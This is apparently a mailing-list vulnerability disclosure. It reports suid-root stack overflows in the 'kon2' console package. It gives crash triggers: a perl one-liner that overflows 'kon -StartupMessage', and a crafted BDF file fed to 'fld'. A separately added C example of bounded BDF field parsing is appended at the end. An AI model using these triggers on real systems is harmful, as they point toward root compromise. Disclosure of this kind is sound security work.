Subject: Problems with "kon2" package
From: Chris Evans (chrisFERRET.LMH.OX.AC.UK)
Date: Mon Jun 19 2000 - 17:51:53 CDT
I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console I'm led to believe.
In the version I briefly examined, there were three suid-root executables
Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified if something has dropped root
privileges or not at the time of the overflows.
No discussion of code flaws today, because boring stack overflows are
kon VGA -StartupMessage `perl -e 'print "A"x10000'`
=> segfault with EIP 0x41414141
a) Create file "read.me.and.die", contents:
BUT substitute each sequence of A's for 200 A's
b) fld -t bdf read.me.and.die
I don't get a clean 0x41414141 stacktrace, but that's just a minor detail,
and these things are always circumventable (I think a pointer gets
toasted in between two char buffers on the stack).
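A bounded BDF field parser of the kind that would have refused the over-long fields fed to "fld -t bdf" above, written here as an added example (this is not kon2's code); the 64-byte field size, the function names and the sample headers are assumptions constructed for the illustration.

```c
#include <string.h>

#define FIELD_MAX 64   /* hypothetical fixed field buffer size, not kon2's */
enum bdf_status { BDF_OK = 0, BDF_TOO_LONG = -1 };

/* Split one "KEYWORD [argument]" BDF line into two fixed buffers.  An unbounded
 * strcpy()/sscanf("%s") would run a 200-byte argument straight past a 64-byte
 * buffer; here anything that does not fit (terminator included) is rejected. */
int bdf_parse_line(const char *line, char *key, size_t keysz,
                   char *val, size_t valsz)
{
    size_t len = strcspn(line, "\r\n");            /* this line only */
    const char *sp = memchr(line, ' ', len);       /* keyword/argument split */
    size_t klen = sp ? (size_t)(sp - line) : len;
    const char *v = sp ? sp + 1 : line + len;
    size_t vlen = len - klen - (sp ? 1 : 0);
    if (klen >= keysz || vlen >= valsz) return BDF_TOO_LONG;
    memcpy(key, line, klen); key[klen] = '\0';
    memcpy(val, v, vlen);    val[vlen] = '\0';
    return BDF_OK;
}

/* Walk a whole BDF header line by line; stop at the first oversized field. */
int bdf_check_header(const char *text)
{
    char key[FIELD_MAX], val[FIELD_MAX];
    while (*text) {
        int rc = bdf_parse_line(text, key, sizeof key, val, sizeof val);
        if (rc != BDF_OK) return rc;
        const char *nl = strchr(text, '\n');
        if (!nl) break;
        text = nl + 1;
    }
    return BDF_OK;
}

/* Constructed sample header with ordinary field lengths. */
static const char SAMPLE_OK[] =
    "STARTFONT 2.1\nFONT -misc-fixed-medium-r-normal--16-150-75-75-c-80-iso8859-1\n"
    "SIZE 16 75 75\nFONTBOUNDINGBOX 16 16 0 0\nENDFONT\n";

/* Constructed sample whose FONT name is 200 'A's, the shape of the report's trigger. */
int check_long_font_name(void)
{
    char hdr[256] = "STARTFONT 2.1\nFONT ";
    size_t n = strlen(hdr);
    memset(hdr + n, 'A', 200); hdr[n + 200] = '\0';
    strcat(hdr, "\nENDFONT\n");
    return bdf_check_header(hdr);
}
```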